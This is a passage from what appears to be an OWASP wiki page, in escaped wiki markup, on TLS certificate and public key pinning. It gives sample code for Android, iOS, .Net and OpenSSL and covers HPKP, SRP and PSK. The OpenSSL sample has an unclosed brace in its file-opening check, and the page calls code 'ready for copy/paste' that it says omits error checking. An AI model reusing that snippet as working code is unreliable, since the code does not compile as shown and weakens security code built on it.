&lt;br /&gt;
== What About X509? ==&lt;br /&gt;
&lt;br /&gt;
PKI{X} and the Internet form an intersection. What Internet users expect and what they receive from CAs could vary wildly. For example, an Internet user has security goals, while a CA has revenue goals and legal goals. Many are surprised to learn that the user is often required to perform host identity verification even though the CA issued the certificate (the details are buried in CA warranties on their certificates and their Certification Practice Statement (CPS)).&lt;br /&gt;
&lt;br /&gt;
There are a number of PKI profiles available. For the Internet, &amp;quot;Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL)&amp;quot;, also known as [http://tools.ietf.org/rfc/rfc5280.txt RFC 5280], is of interest. Since a certificate is specified in the ITU's X509 standard, there are lots of mandatory and optional fields available for validation from both bodies. Because of the disjoint goals among groups, the next section provides guidance.&lt;br /&gt;
&lt;br /&gt;
=== Mandatory Checks ===&lt;br /&gt;
&lt;br /&gt;
All X509 verifications must include:&lt;br /&gt;
&lt;br /&gt;
* A path validation check. The check verifies all the signatures on certificates in the chain are valid under a given PKI. The check begins at the server or service's certificate (the leaf), and proceeds back to a trusted root certificate (the root).&lt;br /&gt;
&lt;br /&gt;
* A validity check, or the &amp;lt;tt&amp;gt;notBefore&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt; fields. The &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt; field is especially important since a CA will not warrant the certificate after the date, and it does not have to provide CRL/OCSP updates after the date.&lt;br /&gt;
&lt;br /&gt;
* Revocation status. As with &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt;, revocation is important because the CA will not warrant a certificate once it is listed as revoked. The IETF approved way of checking a certificate's revocation is OCSP and specified in [http://tools.ietf.org/rfc/rfc2560.txt RFC 2560].&lt;br /&gt;
&lt;br /&gt;
=== Optional Checks ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;[Mulling over what else to present, and the best way to present it. Subject name? DNS lookups? Key Usage? Algorithms? Geolocation based on IP? Check back soon.]&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
In the model which pre-dated PKIX RFC-5280, X.509v1 there was strong binding of the certificate Subject name to the X.500 Directory.  With the update to X.509v3, the Directory is  still the standard for authentication of caCertificate attributes, versus accepting a self signed root. Geo-location is important, the fake certificate for Google was given a location of Florida, instead of Mountain View, CA. The binding of the certificate to the Directory can anchor the root caCertificate, in effect &amp;quot;pin&amp;quot; it, to a valid entity that can have demonstrable attributes such as location.  This is detailed in RFC-1255.  Additional fields specified, such as the subject alternative field, for example a RFC-822 email address, or DNS name, can be located in the DNS, but the actual heavy lifting is done by the X.500 Directory, which is used currently as a cross-certificate trust conduit at the Federal Bridge between major communities of interest, that are not Internet focused. While those cross-certificates are valuable in validation between trust communities, a self-signed root, still needs to be either pinned, curated in trust bundle such as in  web browser software secure storage or represented by a federated community. The Directory can play a role to fill in gaps to validate caCertificates, either locally, or nationally under an administrative domain such as c=US. By divorcing the subject from the Directory entry, problems begin to arise in which pinning plays a key role to ensure that client and server have the same reference points.&lt;br /&gt;
&lt;br /&gt;
=== Public Key Checks ===&lt;br /&gt;
&lt;br /&gt;
''Quod vide'' (''q.v.''). Verifying the identity of a host with knowledge of its associated/expected public key is pinning.&lt;br /&gt;
&lt;br /&gt;
== Examples of Pinning ==&lt;br /&gt;
&lt;br /&gt;
This section demonstrates certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. All programs attempt to connect to [https://www.random.org random.org] and fetch bytes (Dr. Mads Haahr participates in AOSP's pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, ''a priori'' knowledge), so they include a copy of the site's public key and pin the identity on the key.&lt;br /&gt;
&lt;br /&gt;
Parameter validation, return value checking, and error checking have been omitted in the code below, but is present in the sample programs. So the sample code is ready for copy/paste. By far, the most uncomfortable languages are C-based: iOS and OpenSSL.&lt;br /&gt;
&lt;br /&gt;
===HTTP pinning===&lt;br /&gt;
[http://www.rfc-editor.org/rfc/rfc7469.txt RFC 7469] introduced a new HTTP header that allows SSL servers to declare hashes of their certificates with time scope in which these certificates should not be changed. For example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
       Public-Key-Pins: max-age=2592000;&lt;br /&gt;
       pin-sha256=&amp;quot;E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=&amp;quot;;&lt;br /&gt;
       pin-sha256=&amp;quot;LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=&amp;quot;;&lt;br /&gt;
       report-uri=&amp;quot;http://example.com/pkp-report&amp;quot;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Please note that [http://www.rfc-editor.org/rfc/rfc7469.txt RFC 7469] is controversial since it allows overrides for locally installed authorities. That is, it allows an adversary or other party who successfully phishes the user to override a known good pinset with non-authentic or fraudulent information. Second, the reporting mechanism is suppressed from broken pinsets, so a complying user agent will be complicit in the cover up after the fact. That is, the reporting of the broken pinset is called out as '''MUST NOT''' report [https://en.wikipedia.org/w/index.php?title=HTTP_Public_Key_Pinning [1]].&lt;br /&gt;
&lt;br /&gt;
=== Android ===&lt;br /&gt;
&lt;br /&gt;
This example is using the concept from [https://developer.android.com/training/articles/security-ssl.html#UnknownCa developer.android.com unknown CA implementation document].&amp;lt;br&amp;gt;&lt;br /&gt;
Basically you can teach HttpsURLConnection to trust a specific set of CAs.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public class KeyPinStore {&lt;br /&gt;
&lt;br /&gt;
    private static KeyPinStore instance = null;&lt;br /&gt;
    private SSLContext sslContext = SSLContext.getInstance(&amp;quot;TLS&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
    public static synchronized KeyPinStore getInstance() throws CertificateException, IOException, KeyStoreException, NoSuchAlgorithmException, KeyManagementException{&lt;br /&gt;
        if (instance == null){&lt;br /&gt;
            instance = new KeyPinStore();&lt;br /&gt;
        }&lt;br /&gt;
        return instance;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    private KeyPinStore() throws CertificateException, IOException, KeyStoreException, NoSuchAlgorithmException, KeyManagementException{&lt;br /&gt;
        // Load CAs from an InputStream&lt;br /&gt;
        // (could be from a resource or ByteArrayInputStream or ...)&lt;br /&gt;
        CertificateFactory cf = CertificateFactory.getInstance(&amp;quot;X.509&amp;quot;);&lt;br /&gt;
        // randomCA.crt should be in the Assets directory&lt;br /&gt;
        InputStream caInput = new BufferedInputStream(MainActivity.context.getAssets().open(&amp;quot;randomCA.crt&amp;quot;));&lt;br /&gt;
        Certificate ca;&lt;br /&gt;
        try {&lt;br /&gt;
            ca = cf.generateCertificate(caInput);&lt;br /&gt;
            System.out.println(&amp;quot;ca=&amp;quot; + ((X509Certificate) ca).getSubjectDN());&lt;br /&gt;
        } finally {&lt;br /&gt;
            caInput.close();&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        // Create a KeyStore containing our trusted CAs&lt;br /&gt;
        String keyStoreType = KeyStore.getDefaultType();&lt;br /&gt;
        KeyStore keyStore = KeyStore.getInstance(keyStoreType);&lt;br /&gt;
        keyStore.load(null, null);&lt;br /&gt;
        keyStore.setCertificateEntry(&amp;quot;ca&amp;quot;, ca);&lt;br /&gt;
&lt;br /&gt;
        // Create a TrustManager that trusts the CAs in our KeyStore&lt;br /&gt;
        String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();&lt;br /&gt;
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);&lt;br /&gt;
        tmf.init(keyStore);&lt;br /&gt;
&lt;br /&gt;
        // Create an SSLContext that uses our TrustManager&lt;br /&gt;
        // SSLContext context = SSLContext.getInstance(&amp;quot;TLS&amp;quot;);&lt;br /&gt;
        sslContext.init(null, tmf.getTrustManagers(), null);&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    public SSLContext getContext(){&lt;br /&gt;
        return sslContext;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can check this [https://github.com/riramar/pubkey-pin-android Android app pubkey-pin-android] on Github as full example.&lt;br /&gt;
&lt;br /&gt;
=== iOS ===&lt;br /&gt;
&lt;br /&gt;
An open-source SSL pinning library for iOS and OS X was released at Black Hat 2015, which provides an easy-to-use API for deploying pinning within an App: https://github.com/datatheorem/TrustKit .&lt;br /&gt;
&lt;br /&gt;
Otherwise and when using NSURLConnection, iOS pinning is performed through a &amp;lt;tt&amp;gt;NSURLConnectionDelegate&amp;lt;/tt&amp;gt;. The delegate must implement &amp;lt;tt&amp;gt;connection:canAuthenticateAgainstProtectionSpace:&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;. Within &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;, the delegate must call &amp;lt;tt&amp;gt;SecTrustEvaluate&amp;lt;/tt&amp;gt; to perform customary X509 checks.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-ios.zip|iOS sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;-(IBAction)fetchButtonTapped:(id)sender&lt;br /&gt;
{&lt;br /&gt;
    NSString* requestString = @&amp;quot;https://www.random.org/integers/?&lt;br /&gt;
        num=16&amp;amp;min=0&amp;amp;max=255&amp;amp;col=16&amp;amp;base=16&amp;amp;format=plain&amp;amp;rnd=new&amp;quot;;&lt;br /&gt;
    NSURL* requestUrl = [NSURL URLWithString:requestString];&lt;br /&gt;
&lt;br /&gt;
    NSURLRequest* request = [NSURLRequest requestWithURL:requestUrl&lt;br /&gt;
                                             cachePolicy:NSURLRequestReloadIgnoringLocalCacheData&lt;br /&gt;
                                         timeoutInterval:10.0f];&lt;br /&gt;
&lt;br /&gt;
    NSURLConnection* connection = [[NSURLConnection alloc] initWithRequest:request delegate:self];&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
-(BOOL)connection:(NSURLConnection *)connection canAuthenticateAgainstProtectionSpace:&lt;br /&gt;
                  (NSURLProtectionSpace*)space&lt;br /&gt;
{&lt;br /&gt;
    return [[space authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust];&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
- (void)connection:(NSURLConnection *)connection didReceiveAuthenticationChallenge:&lt;br /&gt;
                   (NSURLAuthenticationChallenge *)challenge&lt;br /&gt;
{&lt;br /&gt;
  if ([[[challenge protectionSpace] authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust])&lt;br /&gt;
  {&lt;br /&gt;
    do&lt;br /&gt;
    {&lt;br /&gt;
      SecTrustRef serverTrust = [[challenge protectionSpace] serverTrust];&lt;br /&gt;
      if(nil == serverTrust)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      OSStatus status = SecTrustEvaluate(serverTrust, NULL);&lt;br /&gt;
      if(!(errSecSuccess == status))&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      SecCertificateRef serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0);&lt;br /&gt;
      if(nil == serverCertificate)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      CFDataRef serverCertificateData = SecCertificateCopyData(serverCertificate);&lt;br /&gt;
      [(id)serverCertificateData autorelease];&lt;br /&gt;
      if(nil == serverCertificateData)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      const UInt8* const data = CFDataGetBytePtr(serverCertificateData);&lt;br /&gt;
      const CFIndex size = CFDataGetLength(serverCertificateData);&lt;br /&gt;
      NSData* cert1 = [NSData dataWithBytes:data length:(NSUInteger)size];&lt;br /&gt;
&lt;br /&gt;
      NSString *file = [[NSBundle mainBundle] pathForResource:@&amp;quot;random-org&amp;quot; ofType:@&amp;quot;der&amp;quot;];&lt;br /&gt;
      NSData* cert2 = [NSData dataWithContentsOfFile:file];&lt;br /&gt;
&lt;br /&gt;
      if(nil == cert1 || nil == cert2)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      const BOOL equal = [cert1 isEqualToData:cert2];&lt;br /&gt;
      if(!equal)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      // The only good exit point&lt;br /&gt;
      return [[challenge sender] useCredential: [NSURLCredential credentialForTrust: serverTrust]&lt;br /&gt;
                    forAuthenticationChallenge: challenge];&lt;br /&gt;
    } while(0);&lt;br /&gt;
&lt;br /&gt;
    // Bad dog&lt;br /&gt;
    return [[challenge sender] cancelAuthenticationChallenge: challenge];&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== .Net ===&lt;br /&gt;
&lt;br /&gt;
.Net pinning can be achieved by using &amp;lt;tt&amp;gt;ServicePointManager&amp;lt;/tt&amp;gt; as shown below.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-dotnet.zip|.Net sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Encoded RSAPublicKey&lt;br /&gt;
private static String PUB_KEY = &amp;quot;30818902818100C4A06B7B52F8D17DC1CCB47362&amp;quot; +&lt;br /&gt;
    &amp;quot;C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E&amp;quot; +&lt;br /&gt;
    &amp;quot;D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2&amp;quot; +&lt;br /&gt;
    &amp;quot;9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE&amp;quot; +&lt;br /&gt;
    &amp;quot;2C3F4CBED9460129C72B0203010001&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
public static void Main(string[] args)&lt;br /&gt;
{&lt;br /&gt;
  ServicePointManager.ServerCertificateValidationCallback = PinPublicKey;&lt;br /&gt;
  WebRequest wr = WebRequest.Create(&amp;quot;https://encrypted.google.com/&amp;quot;);&lt;br /&gt;
  wr.GetResponse();&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
public static bool PinPublicKey(object sender, X509Certificate certificate, X509Chain chain,&lt;br /&gt;
                                SslPolicyErrors sslPolicyErrors)&lt;br /&gt;
{&lt;br /&gt;
  if (null == certificate)&lt;br /&gt;
    return false;&lt;br /&gt;
&lt;br /&gt;
  String pk = certificate.GetPublicKeyString();&lt;br /&gt;
  if (pk.Equals(PUB_KEY))&lt;br /&gt;
    return true;&lt;br /&gt;
&lt;br /&gt;
  // Bad dog&lt;br /&gt;
  return false;&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== OpenSSL ===&lt;br /&gt;
&lt;br /&gt;
Pinning can occur at one of two places with OpenSSL. First is the user supplied &amp;lt;tt&amp;gt;verify_callback&amp;lt;/tt&amp;gt;. Second is after the connection is established via &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt;. Either method will allow you to access the peer's certificate.&lt;br /&gt;
&lt;br /&gt;
Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt; with a '''NULL''' certificate. To check the result of the customary verification: (1) you must call &amp;lt;tt&amp;gt;SSL_get_verify_result&amp;lt;/tt&amp;gt; and verify the return code is &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt;; and (2) you must call &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt; and verify the certificate is '''non-NULL'''.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;int pkp_pin_peer_pubkey(SSL* ssl)&lt;br /&gt;
{&lt;br /&gt;
    if(NULL == ssl) return FALSE;&lt;br /&gt;
    &lt;br /&gt;
    X509* cert = NULL;&lt;br /&gt;
    FILE* fp = NULL;&lt;br /&gt;
    &lt;br /&gt;
    /* Scratch */&lt;br /&gt;
    int len1 = 0, len2 = 0;&lt;br /&gt;
    unsigned char *buff1 = NULL, *buff2 = NULL;&lt;br /&gt;
    &lt;br /&gt;
    /* Result is returned to caller */&lt;br /&gt;
    int ret = 0, result = FALSE;&lt;br /&gt;
    &lt;br /&gt;
    do&lt;br /&gt;
    {&lt;br /&gt;
        /* http://www.openssl.org/docs/ssl/SSL_get_peer_certificate.html */&lt;br /&gt;
        cert = SSL_get_peer_certificate(ssl);&lt;br /&gt;
        if(!(cert != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Begin Gyrations to get the subjectPublicKeyInfo       */&lt;br /&gt;
        /* Thanks to Viktor Dukhovni on the OpenSSL mailing list */&lt;br /&gt;
        &lt;br /&gt;
        /* http://groups.google.com/group/mailing.openssl.users/browse_thread/thread/d61858dae102c6c7 */&lt;br /&gt;
        len1 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), NULL);&lt;br /&gt;
        if(!(len1 &amp;gt; 0))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* scratch */&lt;br /&gt;
        unsigned char* temp = NULL;&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
        buff1 = temp = OPENSSL_malloc(len1);&lt;br /&gt;
        if(!(buff1 != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/d2i_X509.html */&lt;br /&gt;
        len2 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), &amp;amp;temp);&lt;br /&gt;
&lt;br /&gt;
        /* These checks are verifying we got back the same values as when we sized the buffer.      */&lt;br /&gt;
        /* Its pretty weak since they should always be the same. But it gives us something to test. */&lt;br /&gt;
        if(!((len1 == len2) &amp;amp;&amp;amp; (temp != NULL) &amp;amp;&amp;amp; ((temp - buff1) == len1)))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* End Gyrations */&lt;br /&gt;
        &lt;br /&gt;
        /* See the warning above!!!                                            */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fopen.html */&lt;br /&gt;
        fp = fopen(&amp;quot;random-org.der&amp;quot;, &amp;quot;rx&amp;quot;);&lt;br /&gt;
        if(NULL ==fp) {&lt;br /&gt;
            fp = fopen(&amp;quot;random-org.der&amp;quot;, &amp;quot;r&amp;quot;);&lt;br /&gt;
        &lt;br /&gt;
        if(!(NULL != fp))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Seek to eof to determine the file's size                            */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */&lt;br /&gt;
        ret = fseek(fp, 0, SEEK_END);&lt;br /&gt;
        if(!(0 == ret))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Fetch the file's size                                               */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/ftell.html */&lt;br /&gt;
        long size = ftell(fp);&lt;br /&gt;
&lt;br /&gt;
        /* Arbitrary size, but should be relatively small (less than 1K or 2K) */&lt;br /&gt;
        if(!(size != -1 &amp;amp;&amp;amp; size &amp;gt; 0 &amp;amp;&amp;amp; size &amp;lt; 2048))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Rewind to beginning to perform the read                             */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */&lt;br /&gt;
        ret = fseek(fp, 0, SEEK_SET);&lt;br /&gt;
        if(!(0 == ret))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Re-use buff2 and len2 */&lt;br /&gt;
        buff2 = NULL; len2 = (int)size;&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
        buff2 = OPENSSL_malloc(len2);&lt;br /&gt;
        if(!(buff2 != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fread.html */&lt;br /&gt;
        /* Returns number of elements read, which should be 1 */&lt;br /&gt;
        ret = (int)fread(buff2, (size_t)len2, 1, fp);&lt;br /&gt;
        if(!(ret == 1))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Re-use size. MIN and MAX macro below... */&lt;br /&gt;
        size = len1 &amp;lt; len2 ? len1 : len2;&lt;br /&gt;
        &lt;br /&gt;
        /*************************/&lt;br /&gt;
        /*****    PAYDIRT    *****/&lt;br /&gt;
        /*************************/&lt;br /&gt;
        if(len1 != (int)size || len2 != (int)size || 0 != memcmp(buff1, buff2, (size_t)size))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* The one good exit point */&lt;br /&gt;
        result = TRUE;&lt;br /&gt;
        &lt;br /&gt;
    } while(0);&lt;br /&gt;
    &lt;br /&gt;
    if(fp != NULL)&lt;br /&gt;
        fclose(fp);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
    if(NULL != buff2)&lt;br /&gt;
        OPENSSL_free(buff2);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
    if(NULL != buff1)&lt;br /&gt;
        OPENSSL_free(buff1);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/X509_new.html */&lt;br /&gt;
    if(NULL != cert)&lt;br /&gt;
        X509_free(cert);&lt;br /&gt;
    &lt;br /&gt;
    return result;&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Pinning Alternatives ==&lt;br /&gt;
&lt;br /&gt;
Not all applications use split key cryptography. Fortunately, there are protocols which allow you to set up a secure channel based on knowledge of passwords and pre-shared secrets (rather than putting the secret on the wire in a basic authentication scheme). Two are listed below - SRP and PSK. SRP and PSK have [http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-3 88 cipher suites assigned to them by IANA for TLS], so there's no shortage of choices.&lt;br /&gt;
&lt;br /&gt;
{| align=&amp;quot;center&amp;quot;&lt;br /&gt;
| [[File:pin-iana-assigned.png|thumb|450px|Figure 3: IANA reserved cipher suites for SRP and PSK]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== SRP ===&lt;br /&gt;
&lt;br /&gt;
Secure Remote Password (SRP) is a Password Authenticated Key Exchange (PAKE) by Thomas Wu based upon Diffie-Hellman. The protocol is standardized in [https://tools.ietf.org/rfc/rfc5054.txt RFC 5054] and available in the OpenSSL library (among others). In the SRP scheme, the server uses a verifier which consists of a &amp;lt;tt&amp;gt;{salt, hash(password)}&amp;lt;/tt&amp;gt; pair. The user has the password and receives the salt from the server. With lots of hand waving, both parties select per-instance random values (nonces) and execute the protocol using ''g&amp;lt;sup&amp;gt;{(salt + password)|verifier} + nonces&amp;lt;/sup&amp;gt;'' rather than traditional Diffie-Hellman using ''g&amp;lt;sup&amp;gt;ab&amp;lt;/sup&amp;gt;''.&lt;br /&gt;
&lt;br /&gt;
[[File:homer-p-np.jpg|thumb|right|150px|P=NP!!!]]Diffie-Hellman based schemes are part of a family of problems based on Discrete Logs (DL), which are logarithms over a finite field. DL schemes are appealing because they are known to be hard (unless ''P=NP'', which would cause computational number theorists to have a cow).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== PSK ===&lt;br /&gt;
&lt;br /&gt;
PSK is Pre-Shared Key and specified in [https://tools.ietf.org/rfc/rfc4279.txt RFC 4279] and [https://tools.ietf.org/rfc/rfc4764.txt RFC 4764]. The shared secret is used as a pre-master secret in TLS-PSK for SSL/TLS; or used to key a block cipher in EAP-PSK. EAP-PSK is designed for authentication over insecure networks such as IEEE 802.11.&lt;br /&gt;
&lt;br /&gt;
== Miscellaneous ==&lt;br /&gt;
&lt;br /&gt;
This sections covers administrivia and miscellaneous items related to pinning.&lt;br /&gt;
&lt;br /&gt;
=== Ephemeral Keys ===&lt;br /&gt;
&lt;br /&gt;
Ephemeral keys are temporary keys used for one instance of a protocol execution and then thrown away. An ephemeral key has the benefit of providing forward secrecy, meaning a compromise of the site or service's long term (static) signing key does not facilitate decrypting past messages because the key was temporary and discarded (once the session terminated).&lt;br /&gt;
&lt;br /&gt;
Ephemeral keys do not affect pinning because the Ephemeral key is delivered in a separate &amp;lt;tt&amp;gt;ServerKeyExchange&amp;lt;/tt&amp;gt; message. In addition, the ephemeral key is a key and not a certificate, so it does not change the construction of the certificate chain. That is, the certificate of interest will still be located at &amp;lt;tt&amp;gt;certificates[0]&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Pinning Gaps ===&lt;br /&gt;
&lt;br /&gt;
There are two gaps when pinning due to reuse of the existing infrastructure and protocols. First, an explicit challenge is '''not''' sent by the program to the peer server based on the server's public information. So the program never knows if the peer can actually decrypt messages. However, the shortcoming is usually academic in practice since an adversary will receive messages it can't decrypt.&lt;br /&gt;
&lt;br /&gt;
Second is revocation. Clients don't usually engage in revocation checking, so it could be possible to use a known bad certificate or key in a pinset. Even if revocation is active, Certificate Revocation Lists (CRLs) and Online Certificate Status Protocol (OCSP) can be defeated in a hostile environment. An application can take steps to remediate, with the primary means being freshness. That is, an application should be updated and distributed immediately when a critical security parameter changes.&lt;br /&gt;
&lt;br /&gt;
=== No Relationship ^@$! ===&lt;br /&gt;
&lt;br /&gt;
If you don't have a pre-existing relationship, all is not lost. First, you can pin a host or server's certificate or public key the first time you encounter it. If the bad guy was not active when you encountered the certificate or public key, he or she will not be successful with future funny business.&lt;br /&gt;
&lt;br /&gt;
Second, bad certificates are being spotted quicker in the field due to projects like [http://www.chromium.org Chromium] and [https://addons.mozilla.org/en-us/firefox/addon/certificate-patrol/ Certificate Patrol], and initiatives like the EFF's [https://www.eff.org/observatory SSL Observatory].&lt;br /&gt;
&lt;br /&gt;
Third, help is on its way, and there are a number of futures that will assist with the endeavors:&lt;br /&gt;
&lt;br /&gt;
* Public Key Pinning (http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt) – an extension to the HTTP protocol allowing web host operators to instruct user agents (UAs) to remember (&amp;quot;pin&amp;quot;) the hosts' cryptographic identities for a given period of time.&lt;br /&gt;
* DNS-based Authentication of Named Entities (DANE) (https://datatracker.ietf.org/doc/rfc6698/) - uses Secure DNS to associate Certificates with Domain Names For S/MIME, SMTP with TLS, DNSSEC and TLSA records.&lt;br /&gt;
* Sovereign Keys (http://www.eff.org/sovereign-keys) - operates by providing an optional and secure way of associating domain names with public keys via DNSSEC. PKI (hierarchical) is still used. Semi-centralized with append only logging.&lt;br /&gt;
* Convergence (http://convergence.io) – different [geographical] views of a site and its associated data (certificates and public keys). Web of Trust is used. Semi-centralized.&lt;br /&gt;
&lt;br /&gt;
While Sovereign Keys and Convergence still require us to confer trust to outside parties, the parties involved do not serve share holders or covet revenue streams. Their interests are industry transparency and user security.&lt;br /&gt;
&lt;br /&gt;
=== More Information? ===&lt;br /&gt;
&lt;br /&gt;
Pinning is an ''old new thing'' that has been shaken, stirred, and repackaged. While &amp;quot;pinning&amp;quot; and &amp;quot;pinsets&amp;quot; are relatively new terms for old things, Jon Larimer and Kenny Root spent time on the subject at Google I/O 2012 with their talk ''[https://developers.google.com/events/io/sessions/gooio2012/107/ Security and Privacy in Android Apps]''.&lt;br /&gt;
&lt;br /&gt;
=== Format Conversions ===&lt;br /&gt;
&lt;br /&gt;
As a convenience to readers, the following with convert between PEM and DER format using OpenSSL.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Public key, X509&lt;br /&gt;
$ openssl genrsa -out rsa-openssl.pem 3072&lt;br /&gt;
$ openssl rsa -in rsa-openssl.pem -pubout -outform DER -out rsa-openssl.der&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Private key, PKCS#8&lt;br /&gt;
$ openssl genrsa -out rsa-openssl.pem 3072&lt;br /&gt;
$ openssl pkcs8 -nocrypt -in rsa-openssl.pem -inform PEM -topk8 -outform DER -out rsa-openssl.der&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* OWASP [[Injection_Theory|Injection Theory]]&lt;br /&gt;
* OWASP [[Data_Validation|Data Validation]]&lt;br /&gt;
* OWASP [[Transport_Layer_Protection_Cheat_Sheet|Transport Layer Protection Cheat Sheet]]&lt;br /&gt;
* IETF [http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt Public Key Pinning]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5054.txt RFC 5054 (SRP)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4764.txt RFC 4764 (EAP-PSK)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc1421.txt RFC 1421 (PEM Encoding)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5280.txt RFC 5280 (Internet X.509, PKIX)]&lt;br /&gt;
